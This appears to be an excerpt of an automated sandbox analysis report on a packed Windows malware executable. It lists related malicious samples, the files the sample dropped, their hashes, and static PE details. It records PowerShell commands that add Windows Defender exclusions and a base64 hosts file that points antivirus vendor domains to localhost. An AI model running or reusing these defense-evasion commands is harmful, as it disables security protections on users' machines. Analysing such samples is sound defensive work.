	zmbGUZTICp.exe	Get hash	malicious	Browse	185.233.81.115
	tijXCZsbGe.exe	Get hash	malicious	Browse	185.188.183.61
	K5CrmTWqYm.exe	Get hash	malicious	Browse	185.112.83.97
	JBtjAS1TGq.exe	Get hash	malicious	Browse	185.188.183.61
	eIxMVDoQF3.exe	Get hash	malicious	Browse	185.233.81.115
	PPsa8TXVuy.exe	Get hash	malicious	Browse	185.233.81.115
	JV4ILFxpDY.exe	Get hash	malicious	Browse	185.233.81.115
	gLD9IA2G4A.exe	Get hash	malicious	Browse	185.233.81.115
	U3E7zMaux2.exe	Get hash	malicious	Browse	185.233.81.115
	0Cjy7Lkv1A.exe	Get hash	malicious	Browse	185.233.81.115
	emPJndhuvA.exe	Get hash	malicious	Browse	185.233.81.115

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4fx1ezon.lgh.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4pie02pg.wgf.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5uqrqs4k.34i.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ab5jticm.dks.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_amblrihn.2wj.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_drkkekrp.vde.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eovqy115.iwl.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hm5i3shc.tba.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iaxyhgqf.de5.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kwaaxnaf.rts.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kzwl01ox.zis.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pgos0k0z.2gr.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\Desktop\hosts.bak. (copy) Download File
Process:	C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	8944
Entropy (8bit):	5.510727034396864
Encrypted:	false
SSDEEP:	96:ER9pkfrIrb7ZZAY78Am2NXk/xNFNKNFNUYj4MEHHuoPYo68uXBpkRYnO3rsyZuZo:3IYY18WJ8A3kkZeN
MD5:	7EA0FCED249EA6AF785C5BED13F34336
SHA1:	175059CCA534954759EDFD57BE79BE64D709004C
SHA-256:	18584FE64395B0D826EA692E83B27B4533C47E32097D94269C48F5D19713E8B4
SHA-512:	D952C7B68C9ABF550FF44DAEAE0213C55FA6F7C6290415C810825890857D60536F2BC66FC97E9621C0720D114BEF38913E0EED93EFA68219F9B5F729853A4D84
Malicious:	false
Preview:	CgkJMTI3LjAuMC4xIGxvY2FsaG9zdAoJCTEyNy4wLjAuMSByYWRzLm1jYWZlZS5jb20KCQkxMjcuMC4wLjEgdGhyZWF0ZXhwZXJ0LmNvbQoJCTEyNy4wLjAuMSB2aXJ1c3NjYW4uam90dGkub3JnCgkJMTI3LjAuMC4xIHNjYW5uZXIubm92aXJ1c3RoYW5rcy5vcmcKCQkxMjcuMC4wLjEgdmlyc2Nhbi5vcmcKCQkxMjcuMC4wLjEgc3ltYW50ZWMuY29tCgkJMTI3LjAuMC4xIHVwZGF0ZS5zeW1hbnRlYy5jb20KCQkxMjcuMC4wLjEgY3VzdG9tZXIuc3ltYW50ZWMuY29tCgkJMTI3LjAuMC4xIG1jYWZlZS5jb20KCQkxMjcuMC4wLjEgdXMubWNhZmVlLmNvbQoJCTEyNy4wLjAuMSBtYXN0Lm1jYWZlZS5jb20KCQkxMjcuMC4wLjEgZGlzcGF0Y2gubWNhZmVlLmNvbQoJCTEyNy4wLjAuMSBkb3dubG9hZC5tY2FmZWUuY29tCgkJMTI3LjAuMC4xIHNvcGhvcy5jb20KCQkxMjcuMC4wLjEgc3ltYW50ZWNsaXZldXBkYXRlLmNvbQoJCTEyNy4wLjAuMSBsaXZldXBkYXRlLnN5bWFudGVjbGl2ZXVwZGF0ZS5jb20KCQkxMjcuMC4wLjEgc2VjdXJpdHlyZXNwb25zZS5zeW1hbnRlYy5jb20KCQkxMjcuMC4wLjEgdmlydXNsaXN0LmNvbQoJCTEyNy4wLjAuMSBmLXNlY3VyZS5jb20KCQkxMjcuMC4wLjEga2FzcGVyc2t5LmNvbQoJCTEyNy4wLjAuMSBrYXNwZXJza3ktbGFicy5jb20KCQkxMjcuMC4wLjEgYXZwLmNvbQoJCTEyNy4wLjAuMSBuZXR3b3JrYXNzb2NpYXRlcy5jb20KCQkxMjcuMC4wLjEgY2EuY29tCgkJMTI3LjAuMC4xIG15LWV0

C:\Users\user\Documents\20220114\PowerShell_transcript.358075.9GYwnzwR.20220114191133.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	5555
Entropy (8bit):	5.3807331752623755
Encrypted:	false
SSDEEP:	96:BZjhONyqDo1ZnZahONyqDo1Z0l3tjZkhONyqDo1Zgo99RZu:d
MD5:	1D25826DC4C810920BB7043A30AE63D2
SHA1:	436CD6DB47BD2FA18FD9894FB555CA85D0691F6C
SHA-256:	BC2F4B75059261F23D47FA9576994D2AA1BD7A7C6229247F806D0650832F3282
SHA-512:	57AEA9D43EF3EE117F1A473E8BA48953A946963500CAD80A11DC042F046ED80F3C6C2B838B4D8AD5DB3DF3719C5C91A3C74442490BE9EEC57A18EC85E9BFB799
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20220114191134..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 358075 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp..Process ID: 1068..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20220114191134..******************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp..********************..Windows PowerShell transcript start..Start time: 20220114191540..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 358075 (Microsoft Windows NT

C:\Users\user\Documents\20220114\PowerShell_transcript.358075.Gl0sshOE.20220114191151.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	3234
Entropy (8bit):	5.36056988674478
Encrypted:	false
SSDEEP:	96:BZmhONlaqDo1ZYZrhONlaqDo1ZtAUU5Zj:r4T
MD5:	3290B019E42A1E78B3283DD28F0661C3
SHA1:	D42E3457C990593097D757AB2D3B0773CC11BB18
SHA-256:	4DDD8C0735832D92EA6A6ACFD946E21B09F294D6BA9EF26CE80990171A30AF82
SHA-512:	7EC35D5E28662E72080E0974131623FFE54F0F3B4A90478638FB06A66A5BA4ED07E48874B26F4EF37FFE7C9EE9E5CAC5B6015BA02174CABEC171B5564C603000
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20220114191153..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 358075 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp..Process ID: 3200..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20220114191153..******************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp..********************..Windows PowerShell transcript start..Start time: 20220114191552..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 358075 (Microsoft Windows NT

C:\Users\user\Documents\20220114\PowerShell_transcript.358075.IZ24yRiA.20220114191200.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	3234
Entropy (8bit):	5.361420377712193
Encrypted:	false
SSDEEP:	48:BZJvhOoOmN7JqDYB1ZxN1ZyvhOoOmN7JqDYB1ZwvtcNG+3DtcNG+3DtcNG+3UZZD:BZFhONWqDo1ZRZOhONWqDo1ZwAUUEZl
MD5:	A8930FE14D4FC2754F54AEFE62DFDCE6
SHA1:	56E5460F3F9016DE19C236FC5227B22EE10C8847
SHA-256:	86553318C3C4409CC0D5D12D87B22D66E6227F6280DCE7B1AA73A9AC54865CA2
SHA-512:	64B21B418DA6B2EB49474577134EF2D591982CA2401FFAD79BA8B96B2C11184BA56B963825E4CA90AA101B5FDDAA96686E698875619968049825D934DEB0D9D2
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20220114191200..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 358075 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp..Process ID: 5572..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20220114191200..******************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp..********************..Windows PowerShell transcript start..Start time: 20220114191618..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 358075 (Microsoft Windows NT

C:\Users\user\Documents\20220114\PowerShell_transcript.358075.PhAlNio2.20220114191140.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	5655
Entropy (8bit):	5.3705714673168155
Encrypted:	false
SSDEEP:	96:BZXhONAcqDo1ZthZQhONAcqDo1ZQo+wjZ0yhONAcqDo1ZflggZZa:Ni
MD5:	2BB66BADA2AA66EBFB5A113905A90C49
SHA1:	2C3334B7D66F07C03644215E467F083AD5D89238
SHA-256:	704D02101792089CDB8C56257196B1A2ED153AA4AA9EA3558E6C64707A6025F4
SHA-512:	D99076FAFE53C0F1E45BE7AD377F781FB5A01A12844E1D058C1D80C267E41310AD05C92443889D55E67415C83225087C5F4A60DCCA2D54C633F3F148B3F58998
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20220114191141..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 358075 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft..Process ID: 5616..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20220114191141..******************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft..********************..Windows PowerShell transcript start..Start time: 20220114191520..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 358075 (Micros

C:\Users\user\Documents\20220114\PowerShell_transcript.358075._bhdDFjc.20220114191205.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	3291
Entropy (8bit):	5.3500089296848365
Encrypted:	false
SSDEEP:	96:BZWhONAlqDo1ZIhZ1hONAlqDo1ZadZZmZs:+
MD5:	2F603ABDABD1B16AAE8EFAAF1013FDA8
SHA1:	C83105F78E3290BAB49329B87CA417BA3CD00081
SHA-256:	BE7CC110A610AE0A60E00E8ABD5A41177CA779EB47E02284D1F89ED7F8DC8DD8
SHA-512:	290757A7D4DA286425E06C38C56B92324629CB9CB56CD3BC7230836B55CBAF9E5BC6290E74A15B486743FE9C5E529349A0176BBDCE3078B1B1D856954E716DFA
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20220114191207..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 358075 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft..Process ID: 1068..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20220114191207..******************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft..********************..Windows PowerShell transcript start..Start time: 20220114191617..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 358075 (Micros

C:\Users\user\Documents\20220114\PowerShell_transcript.358075.modYJzHz.20220114191155.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	3291
Entropy (8bit):	5.351849438556751
Encrypted:	false
SSDEEP:	96:BZ7hONABqDo1Z9hZXhONABqDo1Z1dZZkZF:u
MD5:	541EBD96FE5F89B568C4F516BD606AED
SHA1:	4565038A42D265855BEA5C8F5D78B7C39781FFA6
SHA-256:	1A74BF462436C37C738EBE17DCD53254BBB84F2DAE22BC6C03C079E5B541E825
SHA-512:	8E84045720D67948328E4820952BD4C8DC1A5A7B0D5252FECFF5576B3AA7F9C807E1CEEC40A84D31916433A7241E878D1A8A8DDC46C137884BD8134C358D893B
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20220114191156..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 358075 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft..Process ID: 2924..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20220114191156..******************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft..********************..Windows PowerShell transcript start..Start time: 20220114191602..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 358075 (Micros

C:\Windows\System32\drivers\etc\hosts Download File
Process:	C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	8944
Entropy (8bit):	5.510727034396864
Encrypted:	false
SSDEEP:	96:ER9pkfrIrb7ZZAY78Am2NXk/xNFNKNFNUYj4MEHHuoPYo68uXBpkRYnO3rsyZuZo:3IYY18WJ8A3kkZeN
MD5:	7EA0FCED249EA6AF785C5BED13F34336
SHA1:	175059CCA534954759EDFD57BE79BE64D709004C
SHA-256:	18584FE64395B0D826EA692E83B27B4533C47E32097D94269C48F5D19713E8B4
SHA-512:	D952C7B68C9ABF550FF44DAEAE0213C55FA6F7C6290415C810825890857D60536F2BC66FC97E9621C0720D114BEF38913E0EED93EFA68219F9B5F729853A4D84
Malicious:	true
Preview:	CgkJMTI3LjAuMC4xIGxvY2FsaG9zdAoJCTEyNy4wLjAuMSByYWRzLm1jYWZlZS5jb20KCQkxMjcuMC4wLjEgdGhyZWF0ZXhwZXJ0LmNvbQoJCTEyNy4wLjAuMSB2aXJ1c3NjYW4uam90dGkub3JnCgkJMTI3LjAuMC4xIHNjYW5uZXIubm92aXJ1c3RoYW5rcy5vcmcKCQkxMjcuMC4wLjEgdmlyc2Nhbi5vcmcKCQkxMjcuMC4wLjEgc3ltYW50ZWMuY29tCgkJMTI3LjAuMC4xIHVwZGF0ZS5zeW1hbnRlYy5jb20KCQkxMjcuMC4wLjEgY3VzdG9tZXIuc3ltYW50ZWMuY29tCgkJMTI3LjAuMC4xIG1jYWZlZS5jb20KCQkxMjcuMC4wLjEgdXMubWNhZmVlLmNvbQoJCTEyNy4wLjAuMSBtYXN0Lm1jYWZlZS5jb20KCQkxMjcuMC4wLjEgZGlzcGF0Y2gubWNhZmVlLmNvbQoJCTEyNy4wLjAuMSBkb3dubG9hZC5tY2FmZWUuY29tCgkJMTI3LjAuMC4xIHNvcGhvcy5jb20KCQkxMjcuMC4wLjEgc3ltYW50ZWNsaXZldXBkYXRlLmNvbQoJCTEyNy4wLjAuMSBsaXZldXBkYXRlLnN5bWFudGVjbGl2ZXVwZGF0ZS5jb20KCQkxMjcuMC4wLjEgc2VjdXJpdHlyZXNwb25zZS5zeW1hbnRlYy5jb20KCQkxMjcuMC4wLjEgdmlydXNsaXN0LmNvbQoJCTEyNy4wLjAuMSBmLXNlY3VyZS5jb20KCQkxMjcuMC4wLjEga2FzcGVyc2t5LmNvbQoJCTEyNy4wLjAuMSBrYXNwZXJza3ktbGFicy5jb20KCQkxMjcuMC4wLjEgYXZwLmNvbQoJCTEyNy4wLjAuMSBuZXR3b3JrYXNzb2NpYXRlcy5jb20KCQkxMjcuMC4wLjEgY2EuY29tCgkJMTI3LjAuMC4xIG15LWV0

\Device\Null Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	466
Entropy (8bit):	4.892440045701878
Encrypted:	false
SSDEEP:	12:IStfsj/zRLV85+VuIHSk/ko+jLbdhFp+9Hv:ntQF5utk/ko+3bdhy
MD5:	EC0CD8FB16185F3892DD2C39D6FC2FE9
SHA1:	53FB6A2E739DA030FE1D1BBFB9481E0CDE1765F7
SHA-256:	0183B25F759F83A5F6F6330B9AFA0078E6B23BD0081CFAD7ACD7925976DE392F
SHA-512:	9C25E6DD2B9D35C0DCB8AFB4B8F431BE5C6D1A7AAD75B426E4FD52DDBAAF00186FF913123957E8203EDA1880158FB551B4816C9628D320D8893E729F93EC74B0
Malicious:	false
Preview:	Add-MpPreference : You don't have enough permissions to perform the requested operation...At line:1 char:1..+ Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Micros .....+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], .. CimException.. + FullyQualifiedErrorId : HRESULT 0xc0000142,Add-MpPreference.. ..

Static File Info

General
File type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Entropy (8bit):	7.8679927345645195
TrID:	Win64 Executable (generic) (12005/4) 74.80% Generic Win/DOS Executable (2004/3) 12.49% DOS Executable Generic (2002/1) 12.47% VXD Driver (31/22) 0.19% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
File name:	5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe
File size:	1843200
MD5:	8fb77edbae0c40e1e19d82a406b7615a
SHA1:	0d1580519970aadaae7a4771bba39668ac0c583f
SHA256:	5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e170063a684e21bcf078
SHA512:	4de4c2b2f6c72de263cb0ed42df2f6fc502582a795cc00cd47f33465575e3ee1e85d28b9383e3c2d258e3dc3dd665cab34c4c3f609b3c7145a9e8d0d284da508
SSDEEP:	49152:w7tSsBqGiSI6UlFlD6p0PDmkpcaNv9eSY9h:wZSsqPJ60qCR7Nq
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........8M.......#...... ........3...O...3...@...............................P............... ............................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x8fe990
Entrypoint Section:	UPX1
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
